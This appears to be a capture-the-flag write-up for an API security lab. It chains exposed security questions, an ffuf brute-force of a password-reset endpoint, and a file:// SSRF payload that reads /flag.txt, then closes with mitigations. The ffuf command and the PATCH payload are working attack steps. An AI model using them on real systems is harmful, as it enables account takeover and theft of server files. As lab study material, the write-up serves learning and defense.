🔴 Skills Assessment - Full Exploit Chain (v2)

Introduction

Although v2 was claimed to be secure, multiple vulnerabilities can still be chained together to achieve full compromise.

This attack consists of:

1. Excessive Data Exposure
2. Weak Authentication (Security Question)
3. Account Takeover via brute force
4. SSRF → Local File Read

Objective

Retrieve the contents of:

/flag.txt

Step 1: Initial Access

We authenticate as a customer:

POST /api/v2/authentication/customers/sign-in

Then check roles:

GET /api/v2/roles/current-user

Response:

{
  "errorMessage": "User does not have any roles assigned"
}

No roles = limited access So we focus on endpoints that require no roles

Step 2: Identify Sensitive Data Exposure

We explore supplier-related endpoints and discover that some endpoints expose:

• Emails
• Security questions

This is a Broken Object Property Level Authorization (BOPLA) issue.

Example:

"What is your favorite color?"

Weak, guessable security question

Step 3: Brute-Force Security Question (Account Takeover)

We exploit the password reset endpoint:

/api/v2/authentication/suppliers/passwords/resets/security-question-answers

ffuf Attack

ffuf -w emails.txt:EMAIL -w colors.txt:COLOR \
-u http://<TARGET_IP>/api/v2/authentication/suppliers/passwords/resets/security-question-answers \
-X POST \
-H 'Content-Type: application/json' \
-d '{"SupplierEmail": "EMAIL", "SecurityQuestionAnswer": "COLOR", "NewPassword": "123456"}' \
-fr "false"

Result

COLOR: rust
EMAIL: B.Rogers1535@globalsolutions.com

This means:

• Correct security answer found: rust
• Password successfully reset

Step 4: Login to Compromised Account

We now authenticate as:

B.Rogers1535@globalsolutions.com

Then check user data:

GET /api/v2/suppliers/current-user

Important Observation

{
  "professionalCVPDFFileURI": "SupplierDidNotUploadYet"
}

This field is user-controlled and looks interesting

Step 5: Identify SSRF Entry Point

We find that we can update this field:

PATCH /api/v2/suppliers/current-user

Payload:

{
  "SecurityQuestion": "What is your favorite color?",
  "SecurityQuestionAnswer": "blue",
  "ProfessionalCVPDFFileURI": "file:///flag.txt",
  "PhoneNumber": "123456789",
  "Password": "NewPassword123!"
}

Response:

{
  "SuccessStatus": true
}

No validation on file path → SSRF / LFI

Step 6: Read the File

We trigger file retrieval:

GET /api/v2/suppliers/current-user/cv

Response:

{
  "successStatus": true,
  "base64Data": "SFRCe2YxOTBiODB...................."
}

Step 7: Decode the Flag

echo "SFRCe2YxOTBiODB.............." | base64 -d

Output:

HTB{flag}

Final Flag

HTB{flag}

Vulnerability Chain Explained

1. Excessive Data Exposure (BOPLA)

• Sensitive fields exposed:
• Emails
• Security questions

2. Weak Authentication

• Security question:

What is your favorite color?

• Easily brute-forced

3. Account Takeover

• Password reset endpoint lacks protections
• No rate limiting or lockout

4. Broken Authorization

• Update endpoint requires no roles

5. SSRF / Local File Inclusion

• User controls:

ProfessionalCVPDFFileURI

• Backend reads:

file:///flag.txt

6. Sensitive File Disclosure

• API returns Base64 file content

Security Impact

This chain allows an attacker to:

• Take over supplier accounts
• Read local server files
• Extract secrets and configs
• Potentially escalate to full system compromise

Mitigation

Authentication

• Remove security questions or strengthen them
• Add rate limiting to reset endpoints

Authorization

• Require roles for sensitive operations

Input Validation

• Block file:// scheme
• Restrict file paths to safe directories

Data Exposure

• Do not expose sensitive fields (security questions, emails)

Key Takeaways

• Small issues become critical when chained
• Security questions are weak authentication
• SSRF often leads to LFI
• "No roles required" endpoints are dangerous